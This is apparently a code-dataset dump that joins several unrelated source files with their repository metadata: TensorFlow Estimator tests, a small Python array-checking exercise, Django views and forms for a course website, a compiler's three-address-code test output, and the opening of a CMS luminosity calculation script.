est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
est.fit(iris.data, iris.target, steps=100)
scores = est.evaluate(
x=iris.data,
y=iris.target,
metrics={('accuracy', 'class'): tf.contrib.metrics.streaming_accuracy})
predictions = est.predict(x=iris.data)
predictions_class = est.predict(x=iris.data, outputs=['class'])
self.assertEqual(predictions['class'].shape[0], iris.target.shape[0])
self.assertAllClose(predictions['class'], predictions_class['class'])
self.assertAllClose(predictions['class'], np.argmax(predictions['prob'],
axis=1))
other_score = _sklearn.accuracy_score(iris.target, predictions['class'])
self.assertAllClose(other_score, scores['accuracy'])
self.assertTrue('global_step' in scores)
self.assertEqual(scores['global_step'], 100)
def testIrisInputFn(self):
iris = tf.contrib.learn.datasets.load_iris()
est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
est.fit(input_fn=iris_input_fn, steps=100)
_ = est.evaluate(input_fn=iris_input_fn, steps=1)
predictions = est.predict(x=iris.data)['class']
self.assertEqual(predictions.shape[0], iris.target.shape[0])
def testIrisIterator(self):
iris = tf.contrib.learn.datasets.load_iris()
est = tf.contrib.learn.Estimator(model_fn=logistic_model_no_mode_fn)
x_iter = itertools.islice(iris.data, 100)
y_iter = itertools.islice(iris.target, 100)
est.fit(x_iter, y_iter, steps=100)
_ = est.evaluate(input_fn=iris_input_fn, steps=1)
predictions = est.predict(x=iris.data)['class']
self.assertEqual(predictions.shape[0], iris.target.shape[0])
def testTrainInputFn(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=1)
_ = est.evaluate(input_fn=boston_eval_fn, steps=1)
def testTrainStepsIsIncremental(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=10)
self.assertEqual(10, est.get_variable_value('global_step'))
est.fit(input_fn=boston_input_fn, steps=15)
self.assertEqual(25, est.get_variable_value('global_step'))
def testTrainMaxStepsIsNotIncremental(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, max_steps=10)
self.assertEqual(10, est.get_variable_value('global_step'))
est.fit(input_fn=boston_input_fn, max_steps=15)
self.assertEqual(15, est.get_variable_value('global_step'))
def testPredict(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
output = est.predict(boston.data)
self.assertEqual(output.shape[0], boston.target.shape[0])
def testPredictInputFn(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
output = est.predict(input_fn=boston_input_fn)
self.assertEqual(output.shape[0], boston.target.shape[0])
def testPredictAsIterable(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
self.assertEqual(
len(list(est.predict(boston.data, batch_size=10, as_iterable=True))),
boston.target.shape[0])
def testPredictInputFnAsIterable(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
boston = tf.contrib.learn.datasets.load_boston()
est.fit(input_fn=boston_input_fn, steps=1)
input_fn = functools.partial(boston_input_fn, num_epochs=1)
self.assertEqual(
len(list(est.predict(input_fn=input_fn, as_iterable=True))),
boston.target.shape[0])
def testWrongInput(self):
def other_input_fn():
return {'other': tf.constant([0, 0, 0])}, tf.constant([0, 0, 0])
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=1)
with self.assertRaises(ValueError):
est.fit(input_fn=other_input_fn, steps=1)
def testMonitors(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn,
steps=21,
monitors=[CheckCallsMonitor(expect_calls=21)])
def testSummaryWriting(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=200)
est.evaluate(input_fn=boston_input_fn, steps=200)
loss_summary = tf.contrib.testing.simple_values_from_events(
tf.contrib.testing.latest_events(est.model_dir), ['loss'])
self.assertEqual(len(loss_summary), 1)
def testLossInGraphCollection(self):
class _LossCheckerHook(tf.train.SessionRunHook):
def begin(self):
self.loss_collection = tf.get_collection(tf.GraphKeys.LOSSES)
hook = _LossCheckerHook()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
est.fit(input_fn=boston_input_fn, steps=200, monitors=[hook])
self.assertTrue(hook.loss_collection)
def test_export_returns_exported_dirname(self):
expected = '/path/to/some_dir'
with tf.test.mock.patch.object(estimator, 'export') as mock_export_module:
mock_export_module._export_estimator.return_value = expected
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
actual = est.export('/path/to')
self.assertEquals(actual, expected)
class InferRealValuedColumnsTest(tf.test.TestCase):
def testInvalidArgs(self):
with self.assertRaisesRegexp(ValueError, 'x or input_fn must be provided'):
tf.contrib.learn.infer_real_valued_columns_from_input(None)
with self.assertRaisesRegexp(ValueError, 'cannot be tensors'):
tf.contrib.learn.infer_real_valued_columns_from_input(tf.constant(1.0))
def _assert_single_feature_column(
self, expected_shape, expected_dtype, feature_columns):
self.assertEqual(1, len(feature_columns))
feature_column = feature_columns[0]
self.assertEqual('', feature_column.name)
self.assertEqual({
'': tf.FixedLenFeature(shape=expected_shape, dtype=expected_dtype)
}, feature_column.config)
def testInt32Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.int32))
self._assert_single_feature_column([8], tf.int32, feature_columns)
def testInt32InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.int32), None))
self._assert_single_feature_column([8], tf.int32, feature_columns)
def testInt64Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.int64))
self._assert_single_feature_column([8], tf.int64, feature_columns)
def testInt64InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.int64), None))
self._assert_single_feature_column([8], tf.int64, feature_columns)
def testFloat32Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.float32))
self._assert_single_feature_column([8], tf.float32, feature_columns)
def testFloat32InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.float32), None))
self._assert_single_feature_column([8], tf.float32, feature_columns)
def testFloat64Input(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(
np.ones(shape=[7, 8], dtype=np.float64))
self._assert_single_feature_column([8], tf.float64, feature_columns)
def testFloat64InputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.ones(shape=[7, 8], dtype=tf.float64), None))
self._assert_single_feature_column([8], tf.float64, feature_columns)
def testBoolInput(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
tf.contrib.learn.infer_real_valued_columns_from_input(
np.array([[False for _ in xrange(8)] for _ in xrange(7)]))
def testBoolInputFn(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (tf.constant(False, shape=[7, 8], dtype=tf.bool), None))
def testStringInput(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input(
np.array([['%d.0' % i for i in xrange(8)] for _ in xrange(7)]))
def testStringInputFn(self):
with self.assertRaisesRegexp(
ValueError, 'on integer or non floating types are not supported'):
# pylint: disable=g-long-lambda
tf.contrib.learn.infer_real_valued_columns_from_input_fn(
lambda: (
tf.constant([['%d.0' % i for i in xrange(8)] for _ in xrange(7)]),
None))
def testBostonInputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
boston_input_fn)
self._assert_single_feature_column(
[_BOSTON_INPUT_DIM], tf.float64, feature_columns)
def testIrisInputFn(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
iris_input_fn)
self._assert_single_feature_column(
[_IRIS_INPUT_DIM], tf.float64, feature_columns)
class ReplicaDeviceSetterTest(tf.test.TestCase):
def testVariablesAreOnPs(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=1))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('/job:ps/task:0', v.device)
self.assertDeviceEqual('/job:ps/task:0', v.initializer.device)
self.assertDeviceEqual('/job:ps/task:0', w.device)
self.assertDeviceEqual('/job:ps/task:0', w.initializer.device)
self.assertDeviceEqual('/job:worker', a.device)
def testVariablesAreLocal(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=0))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('', v.device)
self.assertDeviceEqual('', v.initializer.device)
self.assertDeviceEqual('', w.device)
self.assertDeviceEqual('', w.initializer.device)
self.assertDeviceEqual('', a.device)
def testMutableHashTableIsOnPs(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=1))):
default_val = tf.constant([-1, -1], tf.int64)
table = tf.contrib.lookup.MutableHashTable(tf.string,
tf.int64,
default_val)
input_string = tf.constant(['brain', 'salad', 'tank'])
output = table.lookup(input_string)
self.assertDeviceEqual('/job:ps/task:0', table._table_ref.device)
self.assertDeviceEqual('/job:ps/task:0', output.device)
def testMutableHashTableIsLocal(self):
with tf.device(estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(num_ps_replicas=0))):
default_val = tf.constant([-1, -1], tf.int64)
table = tf.contrib.lookup.MutableHashTable(tf.string,
tf.int64,
default_val)
input_string = tf.constant(['brain', 'salad', 'tank'])
output = table.lookup(input_string)
self.assertDeviceEqual('', table._table_ref.device)
self.assertDeviceEqual('', output.device)
def testTaskIsSetOnWorkerWhenJobNameIsSet(self):
with tf.device(
estimator._get_replica_device_setter(
tf.contrib.learn.RunConfig(
num_ps_replicas=1, job_name='worker', task=3))):
v = tf.Variable([1, 2])
w = tf.Variable([2, 1])
a = v + w
self.assertDeviceEqual('/job:ps/task:0', v.device)
self.assertDeviceEqual('/job:ps/task:0', v.initializer.device)
self.assertDeviceEqual('/job:ps/task:0', w.device)
self.assertDeviceEqual('/job:ps/task:0', w.initializer.device)
self.assertDeviceEqual('/job:worker/task:3', a.device)
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
]
| |
99971c0b16dacf336e6bb8cfec3810444af31ef1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2882/39190/304719.py | 48b5449910760181ac3be5702cc6fd925bd7e81f | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | def func3(arr):
    rra = arr[::-1]                  # reversed copy of arr (rra = arr would only alias the same list)
    peak = max(arr, key=int)         # numeric maximum; the elements are still strings at this point
if arr.index(peak)>0:
for i in range(arr.index(peak)-1):
if int(arr[i])>=int(arr[i+1]):
return False
if arr.index(peak)<len(arr)-rra.index(peak)-1:
for i in range(arr.index(peak),len(arr)-rra.index(peak)-2):
if int(arr[i])!=int(arr[i+1]):
return False
if rra.index(peak)>0:
for i in range(len(arr)-rra.index(peak)-1,len(arr)-1):
if int(arr[i])<=int(arr[i+1]):
return False
return True
ip=input()
arr=input().split(" ")
op=func3(arr)
if op==True:
print("YES")
else:
print("NO") | [
"[email protected]"
]
| |
daa228415a1b3cdca8c7512fe938035567946c7a | fcfd7f52a5592a5f4f46940c78634bf7f40c2ef5 | /apps/organization/views.py | 5ca8e34bde2db550cbfe23ba3b9c388ffa6e1858 | []
| no_license | fank-cd/course_ol_exercise | 0acdca8088c145c7bff9b54a68b62de0eb1c0510 | 10a504a0cfa9bf7754ff7da8e504135e82fdd169 | refs/heads/master | 2020-03-26T05:12:46.040472 | 2018-08-13T07:48:19 | 2018-08-13T07:48:19 | 144,265,376 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,775 | py | # coding:utf-8
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic.base import View
from django.db.models import Q
from courses.models import Course
from operation.models import UserFavorite
from .models import CourseOrg, CityDict, Teacher
from .forms import UserAskForm
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
# Create your views here.
class OrgView(View):
def get(self, request):
all_orgs = CourseOrg.objects.all()
for org in all_orgs:
org.course_nums = org.course_set.count()
org.save()
all_citys = CityDict.objects.all()
hot_orgs = all_orgs.order_by("-click_nums")[:3]
search_keywords = request.GET.get('keywords', '')
if search_keywords:
all_orgs = all_orgs.filter(Q(name__icontains=search_keywords) | Q(desc__contains=search_keywords)
| Q(address__icontains=search_keywords))
city_id = request.GET.get('city', '')
category = request.GET.get('ct', '')
sort = request.GET.get('sort', '')
if sort:
if sort == 'students':
all_orgs = all_orgs.order_by("-students")
if sort == "courses":
all_orgs = all_orgs.order_by("-course_nums")
if city_id:
all_orgs = all_orgs.filter(city_id=int(city_id))
if category:
all_orgs = all_orgs.filter(category=category)
org_nums = all_orgs.count()
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_orgs, 4, request=request)
orgs = p.page(page)
context = {'all_orgs': orgs, "all_citys": all_citys, 'org_nums': org_nums,
"city_id": city_id, "category": category, "hot_orgs": hot_orgs, "sort": sort,
"search_keywords": search_keywords}
return render(request, "org-list.html", context=context)
class AddUserAskView(View):
def post(self,request):
userask_form = UserAskForm(request.POST)
if userask_form.is_valid():
user_ask = userask_form.save(commit=True)
return HttpResponse('{"status":"success"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"您的字段有错误,请检查"}',
content_type='application/json')
class OrgHomeView(View):
def get(self, request, org_id):
course_org = CourseOrg.objects.get(id=int(org_id))
all_courses = course_org.course_set.all()[:4]
all_teachers = course_org.teacher_set.all()[:2]
current_page = 'home'
has_fav = False
course_org.click_nums += 1
course_org.save()
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-homepage.html', {
'course_org': course_org,
'all_courses': all_courses,
'all_teacher': all_teachers,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgCourseView(View):
def get(self, request, org_id):
course_org = CourseOrg.objects.get(id=int(org_id))
all_course = course_org.course_set.all()
current_page = 'course'
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-course.html', {
'all_courses': all_course,
'course_org': course_org,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgDescView(View):
def get(self, request, org_id):
current_page = 'desc'
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-desc.html', {
'course_org': course_org,
'current_page': current_page,
'has_fav': has_fav,
})
class OrgTeacherView(View):
def get(self, request, org_id):
current_pgae = "teacher"
course_org = CourseOrg.objects.get(id=int(org_id))
all_teachers = course_org.teacher_set.all()
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=int(org_id), fav_type=2):
has_fav = True
return render(request, 'org-detail-teachers.html', {
'all_teachers': all_teachers,
'course_org': course_org,
'current_page': current_pgae,
'has_fav': has_fav,
})
class AddFavView(View):
"""
    User favorite / unfavorite functionality
"""
def post(self, request):
id = request.POST.get('fav_id', 0)
type = request.POST.get('fav_type', 0)
if request.user.is_authenticated():
exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(id), fav_type=int(type))
if exist_records:
                # If the record already exists, this request un-favorites it
exist_records.delete()
if int(type) == 1:
course = Course.objects.get(id=int(id))
course.fav_nums -= 1
if course.fav_nums < 0:
course.fav_nums = 0
course.save()
elif int(type) == 2:
org = CourseOrg.objects.get(id=int(id))
org.fav_nums -= 1
if org.fav_nums < 0:
org.fav_nums = 0
org.save()
elif int(type) == 3:
teacher = Teacher.objects.get(id=int(id))
teacher.fav_nums -= 1
if teacher.fav_nums < 0:
teacher.fav_nums = 0
teacher.save()
return HttpResponse('{"status":"success", "msg":"收藏"}', content_type='application/json')
else:
user_fav = UserFavorite()
                # Skip the default case where fav_id / fav_type were not supplied
if int(type) > 0 and int(id) > 0:
user_fav.fav_id = int(id)
user_fav.fav_type = int(type)
user_fav.user = request.user
user_fav.save()
if int(type) == 1:
course = Course.objects.get(id=int(id))
course.fav_nums += 1
course.save()
elif int(type) == 2:
org = CourseOrg.objects.get(id=int(id))
org.fav_nums += 1
org.save()
elif int(type) == 3:
teacher = Teacher.objects.get(id=int(id))
teacher.fav_nums += 1
teacher.save()
return HttpResponse('{"status":"success", "msg":"已收藏"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"收藏出错"}', content_type='application/json')
else:
print "dd"
return HttpResponse('{"status":"fail", "msg":"用户未登录"}', content_type='application/json')
class TeacherListView(View):
def get(self, request):
all_teacher = Teacher.objects.all()
teacher_nums = all_teacher.count()
sort = request.GET.get("sort", "")
if sort:
if sort == 'hot':
all_teacher = all_teacher.order_by('-click_nums')
search_keywords = request.GET.get('keywords', '')
if search_keywords:
all_teacher = all_teacher.filter(Q(name__icontains=search_keywords) |
Q(work_company__contains=search_keywords))
rank_teachers = Teacher.objects.all().order_by("-fav_nums")[:5]
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_teacher, 4, request=request)
teachers = p.page(page)
return render(request, "teachers-list.html", {
"all_teacher": teachers,
"teacher_nums": teacher_nums,
'sort': sort,
"rank_teachers": rank_teachers,
"search_keywords": search_keywords,
})
class TeacherDetailView(View):
def get(self, request, teacher_id):
teacher = Teacher.objects.get(id=int(teacher_id))
all_course = teacher.course_set.all()
teacher.click_nums += 1
teacher.save()
rank_teacher = Teacher.objects.all().order_by("fav_nums")[:5]
has_hav_teacher = False
has_hav_org = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_type=3, fav_id=teacher.id):
has_hav_teacher = True
if UserFavorite.objects.filter(user=request.user, fav_type=2, fav_id=teacher.org.id):
has_hav_org = True
return render(request, "teacher-detail.html", {
"teacher": teacher,
"all_course": all_course,
"rank_teacher": rank_teacher,
"has_fav_teacher": has_hav_teacher,
"has_hav_org": has_hav_org,
})
| [
"[email protected]"
]
| |
9683287354e0075e12fd77dad8cf739231fb23f6 | 0ac4831465d0273effd087c75484474985fd1106 | /link_rec/forms.py | ae67ff1282aa8f0d1c546ad426aa3d76d792747d | []
| no_license | duggalr2/linkedin_recommend | af2a040b69cca4f190b8fe064f8048c0b412483c | d535df1643f2a37b8473962f496d83464aa839f3 | refs/heads/master | 2020-12-02T22:39:51.501151 | 2017-12-05T16:19:58 | 2017-12-05T16:19:58 | 96,162,172 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,627 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.forms import formset_factory, ModelForm
INDUSTRY_CHOICES = (
('software', 'Software'),
('engineering', 'Engineering, excluding Software'),
('research', 'Research'),
('design', 'Design'),
('data_science', 'Data Science'),
('product_manager', 'Product Manager'),
('business_finance', 'Business and Finance'),
    ('startup_founder', 'Startup Founders/Executives'),
    ('admin_coordination', 'Admin/Coordination/IT/HR'),
('crypto_blockchain', 'Cryptography/Blockchain')
)
SCHOOL_NAMES = (
('university_of_toronto', 'University of Toronto'),
('harvard', 'Harvard University'),
('massachusetts_institute_of_technology', 'Massachusetts Institute of Technology'),
('waterloo', 'University of Waterloo'),
('stanford', 'Stanford University'),
('western', 'Western University'),
('university_of_california_berkeley', 'University of California, Berkeley'),
('caltech', 'Caltech'),
('cornell', 'Cornell University'),
('oxford', 'Oxford University'),
('carnegie_mellon_university', 'Carnegie Mellon University'),
('university_of_pennsylvania', 'University of Pennsylvania'),
('cambridge', 'University of Cambridge'),
('university_of_california_los_angeles', 'University of California, Los Angeles'),
('queens', "Queen's University"),
('columbia', 'Columbia University')
)
PROGRAM_CHOICES = (
('computer_science', 'Computer Science'),
('commerce_business', 'Commerce/Business/Finance'),
('humanities_lifesci', 'Humanities/LifeSci/HealthSci'),
('math_physics_statistics', 'Math/Physics/Statistics'),
('engineering', 'Engineering'),
)
class SignUpForm(UserCreationForm):
# this will add additional fields to the built-in User Creation Form
school = forms.ChoiceField(choices=SCHOOL_NAMES,)
school_program = forms.ChoiceField(choices=PROGRAM_CHOICES, )
industry_of_interest = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=INDUSTRY_CHOICES, )
school_of_interest = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=SCHOOL_NAMES, )
name = forms.CharField(max_length=250)
class Meta:
model = User
fields = ('name', 'username', 'password1', 'password2', 'school', 'school_program', 'industry_of_interest', 'school_of_interest')
MISCLASSIFY_SELECTION = (
('education_program', 'Education Program'),
('job_industry', 'Job Industry'),
)
class MisClassify(forms.Form):
first_selection = forms.ChoiceField(choices=MISCLASSIFY_SELECTION, )
class InitialEduClassify(forms.Form):
pass
class JobMisClassify(forms.Form):
# edu_correct = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
def __init__(self, *args, **kwargs):
extra = kwargs.pop('extra')
super(JobMisClassify, self).__init__(*args, **kwargs)
for i, job in enumerate(extra):
self.fields['custom_%s' % i] = forms.ChoiceField(label=job, choices=INDUSTRY_CHOICES, required=False)
# self.fields['custom_%s' % i] = forms.CharField(label=job, max_length=250, required=False)
def extra_answers(self):
for name, value in self.cleaned_data.items():
if name.startswith('custom_'):
yield (self.fields[name].label, value)
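    # Usage sketch (added commentary, not original code): the view building this
    # form passes the job titles through the ``extra`` kwarg, e.g.
    #
    #   form = JobMisClassify(request.POST or None, extra=["Software Engineer", "Data Analyst"])
    #   if form.is_valid():
    #       for job_title, corrected_industry in form.extra_answers():
    #           ...  # persist the user's correction
    #
    # The job titles above are placeholders; the real list comes from the caller.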
# super(EducationMisClassify, self).__init__(*args, **kwargs)
# for i in range(0, n):
# self.fields["edu_correct %d" % i] = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
# edu_correct = forms.CharField(max_length=250)
class EducationMisClassify(forms.Form):
edu_correct = forms.ChoiceField(choices=MISCLASSIFY_SELECTION,)
# job_selection = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple, choices=(('job1', 'Default Job 1'),))
#class AuthorForm(ModelForm):
# class Meta:
# model = Author
# fields = ['name', 'title', 'birth_date']
#
#
#class BookForm(ModelForm):
# class Meta:
# model = Book
# fields = ['name', 'authors']
#
#
#class MultiWidgetBasic(forms.widgets.MultiWidget):
# def __init__(self, attrs=None):
# widgets = [forms.TextInput(),
# forms.TextInput()]
# super(MultiWidgetBasic, self).__init__(widgets, attrs)
#
# def decompress(self, value):
# if value:
# return pickle.loads(value)
# else:
# return ['', '']
#
#
#class MultiExampleField(forms.fields.MultiValueField):
# widget = MultiWidgetBasic
#
# def __init__(self, *args, **kwargs):
# list_fields = [forms.fields.CharField(max_length=31),
# forms.fields.CharField(max_length=31)]
# super(MultiExampleField, self).__init__(list_fields, *args, **kwargs)
#
# def compress(self, values):
# return pickle.dumps(values)
#
#
#class FormForm(forms.Form):
# a = forms.BooleanField()
# b = forms.CharField(max_length=32)
# c = forms.CharField(max_length=32, widget=forms.widgets.Textarea())
# d = forms.CharField(max_length=32, widget=forms.widgets.SplitDateTimeWidget())
# e = forms.CharField(max_length=32, widget=MultiWidgetBasic())
# f = MultiExampleField()
#
# class UserForm(forms.ModelForm):
# class Meta:
# model = User
# fields = ('first_name', 'last_name', 'email')
#
#
# class ProfileForm(forms.ModelForm):
# class Meta:
# model = Profile
# fields = ('bio', 'location', 'birth_date')
| [
"[email protected]"
]
| |
b40e44faa5e369870bc288871dc9c304d99d2c3e | 34474048ec5c4850623cf0fea993b43de76fada4 | /Tests/unittest/code_gen/tac_o1/mix_global_local_nested_int_char_array.tac | 3af956749d4f00960c094f9db45c8c0e838c9ba5 | []
| no_license | imsure/C-- | 69a80e152936e31b14319ab16c2317d2cacc9165 | 9991e7135d6ebc8f6f08f46f37b82bfe353ec17f | refs/heads/master | 2021-01-13T02:04:07.295401 | 2015-05-01T01:26:07 | 2015-05-01T01:26:07 | 30,732,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | tac | main:
Enter main 108
_taddr0 = x + 0
*_taddr0(int) = 0
_taddr1 = y + 0
*_taddr1(char) = 1
_taddr2 = x + 4
*_taddr2(int) = 1
_taddr3 = y + 1
*_taddr3(char) = 2
_taddr4 = x + 8
*_taddr4(int) = 2
_taddr5 = y + 2
*_taddr5(char) = 3
_taddr6 = x + 12
*_taddr6(int) = 3
_taddr7 = y + 3
*_taddr7(char) = 4
_taddr8 = x + 16
*_taddr8(int) = 4
_taddr9 = y + 4
*_taddr9(char) = 55
_taddr10 = x + 0
_tvar0 = *_taddr10(int) * 1
_taddr11 = y + _tvar0
_tvar0 = *_taddr11(char) * 4
_taddr12 = x + _tvar0
_tvar0 = *_taddr12(int) * 1
_taddr13 = y + _tvar0
_tvar0 = *_taddr13(char) * 4
_taddr14 = x + _tvar0
_tvar0 = *_taddr14(int) * 1
_taddr15 = y + _tvar0
_tvar0 = *_taddr15(char) * 4
_taddr16 = x + _tvar0
_tvar0 = *_taddr16(int) * 1
_taddr17 = y + _tvar0
_tvar0 = *_taddr17(char) * 4
_taddr18 = x + _tvar0
_tvar0 = *_taddr18(int) * 1
_taddr19 = y + _tvar0
u = *_taddr19(char)
Param u
Call print_int 1
_tstr0 = "\n"
Param _tstr0
Call print_string 1
Return
| [
"[email protected]"
]
| |
259ffde6c20e473442c24385d68c132bf7ce4779 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /RecoLuminosity/LumiDB/scripts/specificLumi.py | 916399856d1c2d32dd8f1828936869fa5f3be98f | []
| permissive | amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | 2021-01-19T16:18:22.857382 | 2016-08-09T16:40:50 | 2016-08-09T16:40:50 | 262,608,661 | 0 | 0 | Apache-2.0 | 2020-05-09T16:10:07 | 2020-05-09T16:10:07 | null | UTF-8 | Python | false | false | 20,778 | py | #!/usr/bin/env python
########################################################################
# Command to produce perbunch and specific lumi #
# #
# Author: Zhen Xie #
########################################################################
#
# dump all fills into files.
# allfills.txt all the existing fills.
# fill_num.txt all the runs in the fill
# dumpFill -o outputdir
# dumpFill -f fillnum generate runlist for the given fill
#
import os,os.path,sys,math,array,datetime,time,calendar,re
import coral
from RecoLuminosity.LumiDB import argparse,sessionManager,lumiTime,CommonUtil,lumiCalcAPI,lumiParameters,revisionDML,normDML
MINFILL=1800
MAXFILL=9999
allfillname='allfills.txt'
def getFillFromDB(schema,fillnum):
'''
output: {run:starttime}
'''
runtimesInFill={}
fillrundict=lumiCalcAPI.fillrunMap(schema,fillnum)
if len(fillrundict)>0:
runs=fillrundict.values()[0]
runlsdict=dict(zip(runs,[None]*len(runs)))
runresult=lumiCalcAPI.runsummary(schema,runlsdict)
for perrundata in runresult:
runtimesInFill[perrundata[0]]=perrundata[7]
return runtimesInFill
def listfilldir(indir):
'''
list all fills contained in the given dir
input: indir
output: [fill]
'''
fillnamepat=r'^[0-9]{4}$'
p=re.compile(fillnamepat)
processedfills=[]
dirList=os.listdir(indir)
for fname in dirList:
if p.match(fname) and os.path.isdir(os.path.join(indir,fname)):#found fill dir
allfs=os.listdir(os.path.join(indir,fname))
for myfile in allfs:
sumfilenamepat=r'^[0-9]{4}_bxsum_CMS.txt$'
s=re.compile(sumfilenamepat)
if s.match(myfile):
#only if fill_summary_CMS.txt file exists
processedfills.append(int(fname))
return processedfills
def lastcompleteFill(infile):
'''
parse infile to find LASTCOMPLETEFILL
input: input file name
output: last completed fill number
'''
lastfill=None
hlinepat=r'(LASTCOMPLETEFILL )([0-9]{4})'
h=re.compile(hlinepat)
dqmfile=open(infile,'r')
for line in dqmfile:
result=h.match(line)
if result:
lastfill=result.group(2)
break
return int(lastfill)
def calculateSpecificLumi(lumi,lumierr,beam1intensity,beam1intensityerr,beam2intensity,beam2intensityerr):
'''
calculate specific lumi
input: instlumi, instlumierror,beam1intensity,beam1intensityerror,beam2intensity,beam2intensityerror
output (specific lumi value,specific lumi error)
'''
specificlumi=0.0
specificlumierr=0.0
if beam1intensity<0: beam1intensity=0
if beam2intensity<0: beam2intensity=0
if beam1intensity>0.0 and beam2intensity>0.0:
specificlumi=float(lumi)/(float(beam1intensity)*float(beam2intensity))
specificlumierr=specificlumi*math.sqrt(lumierr**2/lumi**2+beam1intensityerr**2/beam1intensity**2+beam2intensityerr**2/beam2intensity**2)
return (specificlumi,specificlumierr)
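# Worked example for calculateSpecificLumi (illustrative numbers, not CMS data):
# with lumi=2.0e2 Hz/ub, lumierr=1.0 and beam intensities 1.0e11 and 1.2e11
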